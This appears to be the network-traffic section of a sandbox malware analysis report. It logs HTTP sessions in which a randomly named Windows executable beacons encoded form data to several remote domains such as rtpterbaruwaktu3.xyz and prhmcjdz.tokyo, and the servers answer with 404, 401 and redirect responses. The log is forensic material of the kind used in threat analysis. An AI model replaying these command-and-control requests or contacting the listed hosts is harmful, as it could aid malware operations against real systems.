                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    12 | 192.168.2.7 | 49985 | 13.248.169.48 | 80 | 6908 | C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 08:17:33.639498949 CET | 483 | OUT | GET /dash/?ef4=TJYXELnhFJhl&QbUPL=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q1LAgUq3XcZwqztHS/MhxxHRy56C3xMKSUemxfPW4qvYN+c3Gdt63iP8z HTTP/1.1
                                                                    Host: www.fortevision.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Jan 11, 2025 08:17:34.103887081 CET | 399 | IN | HTTP/1.1 200 OK
                                                                    content-type: text/html
                                                                    date: Sat, 11 Jan 2025 07:17:34 GMT
                                                                    content-length: 278
                                                                    connection: close
                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ef4=TJYXELnhFJhl&QbUPL=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q1LAgUq3XcZwqztHS/MhxxHRy56C3xMKSUemxfPW4qvYN+c3Gdt63iP8z"}</script></head></html>


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    13 | 192.168.2.7 | 49986 | 103.21.221.87 | 80 | 6908 | C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 08:17:39.417825937 CET | 759 | OUT | POST /mv7p/ HTTP/1.1
                                                                    Host: www.rtpterbaruwaktu3.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.rtpterbaruwaktu3.xyz
                                                                    Referer: http://www.rtpterbaruwaktu3.xyz/mv7p/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 218
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Ascii: QbUPL=0VM7/Aofdi5OaTSScjB0uZEl8WMvNBgSn8J69nEY2FX4hwqDDmNtmVHq4+8FYTNS16G+ED0rVvtnygwzk+CQL4crKZkpLaWxGkOL4S4FpZkIYeSg/8pv/XXb2OoiTZElI8R8LFKffKjZdmMOIAbIzhw4/HbKk+cRiC4dVqIXvkb+yuDxPtNMiNvX3te2JFoinP4t84t7S10gq8eOCQ==
                                                                    Timestamp: Jan 11, 2025 08:17:40.319107056 CET | Bytes transferred: 1033 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 796
                                                                    date: Sat, 11 Jan 2025 07:17:40 GMT
                                                                    server: LiteSpeed
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                    Session ID: 14 | Source IP: 192.168.2.7 | Source Port: 49987 | Destination IP: 103.21.221.87 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp: Jan 11, 2025 08:17:41.958693027 CET | Bytes transferred: 779 | Direction: OUT | Data: POST /mv7p/ HTTP/1.1
                                                                    Host: www.rtpterbaruwaktu3.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.rtpterbaruwaktu3.xyz
                                                                    Referer: http://www.rtpterbaruwaktu3.xyz/mv7p/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 238
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Ascii: QbUPL=0VM7/Aofdi5Oa3WSQkV0p5EilmMvXxhbn8F69mwI2w/4hVWDSSRtnVHqgO9uXzM/16KIEBgrVv5nyhAzkJ2RJoctB5krT6WxGkOL4S8/pfMIZuig/eBsjnXEieoiZ5FuI8ReLEW5fIrZdjoOISjL6hw+wnaz0s9Zr3F6dME11XLnzYCTVPBg8cXszv6Aej1XlO81xaZaNCRKnu/KUiKKvAOK7owQFF1XOkJQUqw=
                                                                    Timestamp: Jan 11, 2025 08:17:42.840620995 CET | Bytes transferred: 1033 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 796
                                                                    date: Sat, 11 Jan 2025 07:17:42 GMT
                                                                    server: LiteSpeed
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                    Session ID: 15 | Source IP: 192.168.2.7 | Source Port: 49988 | Destination IP: 103.21.221.87 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp: Jan 11, 2025 08:17:44.505649090 CET | Bytes transferred: 1792 | Direction: OUT | Data: POST /mv7p/ HTTP/1.1
                                                                    Host: www.rtpterbaruwaktu3.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.rtpterbaruwaktu3.xyz
                                                                    Referer: http://www.rtpterbaruwaktu3.xyz/mv7p/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1250
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Ascii: QbUPL= [TRUNCATED]
                                                                    Timestamp: Jan 11, 2025 08:17:45.391906023 CET | Bytes transferred: 1033 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 796
                                                                    date: Sat, 11 Jan 2025 07:17:45 GMT
                                                                    server: LiteSpeed
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                    Session ID: 16 | Source IP: 192.168.2.7 | Source Port: 49989 | Destination IP: 103.21.221.87 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp: Jan 11, 2025 08:17:47.048573017 CET | Bytes transferred: 488 | Direction: OUT | Data: GET /mv7p/?QbUPL=5Xkb80UCbQYKeySJYU53mvY68yMkCwQR8td5rEUSu2Sur2yiMTlgkW/d3b9rVTV1/KKKFkoFavUE13Uu3OCOHKQPM7koR8LGBXKy+yJDj5RRAPqEofhY8WnntYYNfZxpGMdCDiinSrfj&ef4=TJYXELnhFJhl HTTP/1.1
                                                                    Host: www.rtpterbaruwaktu3.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Timestamp: Jan 11, 2025 08:17:48.016223907 CET | Bytes transferred: 1033 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                                    Connection: close
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 796
                                                                    date: Sat, 11 Jan 2025 07:17:47 GMT
                                                                    server: LiteSpeed
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                    Session ID: 17 | Source IP: 192.168.2.7 | Source Port: 49990 | Destination IP: 8.218.14.120 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp: Jan 11, 2025 08:17:53.745992899 CET | Bytes transferred: 741 | Direction: OUT | Data: POST /cm9a/ HTTP/1.1
                                                                    Host: www.prhmcjdz.tokyo
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.prhmcjdz.tokyo
                                                                    Referer: http://www.prhmcjdz.tokyo/cm9a/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 218
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Ascii: QbUPL=NtlY11u8ww8yv1Zk9AyOEZFMJNKfaJh636DIorNi/Yo5TNS9hdtsGPvMjxzA/U3Qgx3gYINsVJVpTBW7dZ22kRTcuPyncmjUeWe+N+opIDdaA2ni0/lbzcnnvSr9AWylJopKdbCEWOAqhkZUtHfKzXdbcb/4RMB6omt2eDUr7hl7xCE7vus1SzvD/+vmfC+Ossfyakzz9ZBgUktCTA==
                                                                    Timestamp: Jan 11, 2025 08:17:54.627358913 CET | Bytes transferred: 508 | Direction: IN | Data: HTTP/1.1 200
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 07:17:54 GMT
                                                                    Content-Type: application/json;charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Origin
                                                                    Vary: Access-Control-Request-Method
                                                                    Vary: Access-Control-Request-Headers
                                                                    Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                    Access-Control-Allow-Credentials: true
                                                                    X-Content-Type-Options: nosniff
                                                                    X-XSS-Protection: 1; mode=block
                                                                    Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 63 6d 39 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 54{"msg":"/cm9a/","code":401}0


                                                                    Session ID: 18 | Source IP: 192.168.2.7 | Source Port: 49991 | Destination IP: 8.218.14.120 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp: Jan 11, 2025 08:17:56.477174997 CET | Bytes transferred: 761 | Direction: OUT | Data: POST /cm9a/ HTTP/1.1
                                                                    Host: www.prhmcjdz.tokyo
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.prhmcjdz.tokyo
                                                                    Referer: http://www.prhmcjdz.tokyo/cm9a/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 238
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Ascii: QbUPL=NtlY11u8ww8yvVpku3mOUJFDKNKfDZh+36HIopgn/Lc5Sou9iZ5sTPvM7hzF7U3fgx6TYIhsVIxpTBG7dOi3+hTe7/y5SGjUeWe+N+tyIDFaAF/i1b5a/8nk+Sr9EWzsJopodauqWN4qhkpUsSrFmndZS7/maMkBgHMRZ1MRjh965UFZ1MgZMiX478LQIkj7utbqXGHSiukKZ2MGF6cRe58aQCV/u+epEo8kjiw=
                                                                    Timestamp: Jan 11, 2025 08:17:57.228091002 CET | Bytes transferred: 508 | Direction: IN | Data: HTTP/1.1 200
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 07:17:57 GMT
                                                                    Content-Type: application/json;charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Origin
                                                                    Vary: Access-Control-Request-Method
                                                                    Vary: Access-Control-Request-Headers
                                                                    Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                    Access-Control-Allow-Credentials: true
                                                                    X-Content-Type-Options: nosniff
                                                                    X-XSS-Protection: 1; mode=block
                                                                    Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 63 6d 39 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 54{"msg":"/cm9a/","code":401}0


                                                                    Session ID: 19 | Source IP: 192.168.2.7 | Source Port: 49992 | Destination IP: 8.218.14.120 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp: Jan 11, 2025 08:17:59.051192999 CET | Bytes transferred: 1774 | Direction: OUT | Data: POST /cm9a/ HTTP/1.1
                                                                    Host: www.prhmcjdz.tokyo
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.prhmcjdz.tokyo
                                                                    Referer: http://www.prhmcjdz.tokyo/cm9a/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1250
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Ascii: QbUPL= [TRUNCATED]
                                                                    Timestamp: Jan 11, 2025 08:17:59.919323921 CET | Bytes transferred: 508 | Direction: IN | Data:
                                                                    HTTP/1.1 200
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 07:17:59 GMT
                                                                    Content-Type: application/json;charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Origin
                                                                    Vary: Access-Control-Request-Method
                                                                    Vary: Access-Control-Request-Headers
                                                                    Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                    Access-Control-Allow-Credentials: true
                                                                    X-Content-Type-Options: nosniff
                                                                    X-XSS-Protection: 1; mode=block
                                                                    Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 63 6d 39 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 54{"msg":"请求访问：/cm9a/，认证失败，无法访问系统资源","code":401}0 (msg decoded from the Data Raw bytes above, which the ASCII rendering dropped; in English: "Requested access: /cm9a/, authentication failed, unable to access system resources")


                                                                    Session ID: 20 | Source IP: 192.168.2.7 | Source Port: 49993 | Destination IP: 8.218.14.120 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp: Jan 11, 2025 08:18:01.593446970 CET | Bytes transferred: 482 | Direction: OUT | Data:
                                                                    GET /cm9a/?ef4=TJYXELnhFJhl&QbUPL=AvN42DnS9Qw3kn1Ry3KvTJdIGYrzP5U8wu7Mj7dY/pRaa7659YJNcYiJunyE7nDkkRGZb81LCaJ1YXfnfuSvrBPGjvGvWTn9eE6YM8B8FSoiTH7Br/Ez7MnCgATlHy+hFK5SJ9epG9Mk HTTP/1.1
                                                                    Host: www.prhmcjdz.tokyo
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Timestamp: Jan 11, 2025 08:18:02.476223946 CET | Bytes transferred: 427 | Direction: IN | Data:
                                                                    HTTP/1.1 200
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 07:18:02 GMT
                                                                    Content-Type: application/json;charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Origin
                                                                    Vary: Access-Control-Request-Method
                                                                    Vary: Access-Control-Request-Headers
                                                                    X-Content-Type-Options: nosniff
                                                                    X-XSS-Protection: 1; mode=block
                                                                    X-Cache: MISS
                                                                    Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 63 6d 39 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 54{"msg":"请求访问：/cm9a/，认证失败，无法访问系统资源","code":401}0 (msg decoded from the Data Raw bytes above, which the ASCII rendering dropped; in English: "Requested access: /cm9a/, authentication failed, unable to access system resources")


                                                                    Session ID: 21 | Source IP: 192.168.2.7 | Source Port: 49994 | Destination IP: 203.161.43.228 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp: Jan 11, 2025 08:18:07.520422935 CET | Bytes transferred: 738 | Direction: OUT | Data:
                                                                    POST /6urf/ HTTP/1.1
                                                                    Host: www.connecty.live
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.connecty.live
                                                                    Referer: http://www.connecty.live/6urf/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 218
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 6f 38 49 55 46 49 37 62 6f 6d 4b 4d 47 2b 70 70 4d 39 34 72 31 6e 45 71 72 42 63 55 78 79 66 36 2b 6c 41 68 35 71 37 37 56 42 35 37 56 51 6c 49 43 6e 4a 54 63 71 52 32 39 68 56 55 30 51 6c 4f 51 64 52 4e 30 44 54 79 49 79 55 48 45 54 77 52 76 64 6a 64 31 76 49 48 39 54 52 52 64 35 34 32 69 6e 36 4b 4a 36 4b 54 61 66 31 63 76 37 58 31 49 2f 65 49 67 75 4f 33 6e 70 79 37 33 59 78 78 30 34 53 41 6d 52 36 46 50 45 4b 76 4e 4d 44 41 46 46 45 4f 70 68 4b 6b 6a 6e 38 33 76 35 79 6e 65 41 43 62 6d 58 68 4c 68 68 6c 53 47 4e 59 6f 34 43 6b 77 36 58 61 67 65 5a 34 6a 6a 53 4c 6f 53 75 46 35 71 30 39 49 73 76 6d 59 6c 65 31 36 50 51 3d 3d
                                                                    Data Ascii: QbUPL=o8IUFI7bomKMG+ppM94r1nEqrBcUxyf6+lAh5q77VB57VQlICnJTcqR29hVU0QlOQdRN0DTyIyUHETwRvdjd1vIH9TRRd542in6KJ6KTaf1cv7X1I/eIguO3npy73Yxx04SAmR6FPEKvNMDAFFEOphKkjn83v5yneACbmXhLhhlSGNYo4Ckw6XageZ4jjSLoSuF5q09IsvmYle16PQ==
                                                                    Timestamp: Jan 11, 2025 08:18:08.097700119 CET | Bytes transferred: 658 | Direction: IN | Data:
                                                                    HTTP/1.1 404 Not Found
                                                                    Date: Sat, 11 Jan 2025 07:18:08 GMT
                                                                    Server: Apache
                                                                    Content-Length: 514
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                                                    Session ID: 22 | Source IP: 192.168.2.7 | Source Port: 49995 | Destination IP: 203.161.43.228 | Destination Port: 80 | PID: 6908 | Process: C:\Program Files (x86)\biSCpIqrqBgQNqSHvqzzLpzgCBmCuAmSvemVXtCWXzoBZmZJpjzQDrBNwCodb\tFEgkRNveR.exe
                                                                    Timestamp: Jan 11, 2025 08:18:10.068294048 CET | Bytes transferred: 758 | Direction: OUT | Data:
                                                                    POST /6urf/ HTTP/1.1
                                                                    Host: www.connecty.live
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.5
                                                                    Accept-Encoding: gzip, deflate
                                                                    Origin: http://www.connecty.live
                                                                    Referer: http://www.connecty.live/6urf/
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Connection: close
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 238
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                    Data Raw: 51 62 55 50 4c 3d 6f 38 49 55 46 49 37 62 6f 6d 4b 4d 48 64 78 70 4b 65 51 72 6b 58 45 74 68 68 63 55 2f 53 66 2b 2b 6c 45 68 35 76 4c 72 56 55 70 37 57 78 56 49 44 69 31 54 66 71 52 32 32 42 56 52 36 77 6c 56 51 64 63 36 30 42 48 79 49 79 77 48 45 57 4d 52 73 75 62 53 36 66 49 46 32 7a 52 70 44 4a 34 32 69 6e 36 4b 4a 36 65 31 61 66 64 63 73 4c 6e 31 4a 62 4b 50 6a 75 4f 32 67 70 79 37 7a 59 78 31 30 34 54 6c 6d 51 6d 72 50 42 47 76 4e 4d 54 41 45 55 45 52 38 78 4c 4f 74 48 39 42 75 62 48 73 48 6b 47 47 68 68 31 44 75 52 68 70 4b 62 5a 4b 69 67 6f 63 6b 47 69 62 61 62 63 56 30 30 57 64 51 76 42 68 6e 57 4a 70 7a 59 44 79 6f 4d 55 2b 5a 75 79 61 77 32 51 62 5a 77 65 38 4f 66 7a 4e 62 4b 69 78 4d 32 49 3d
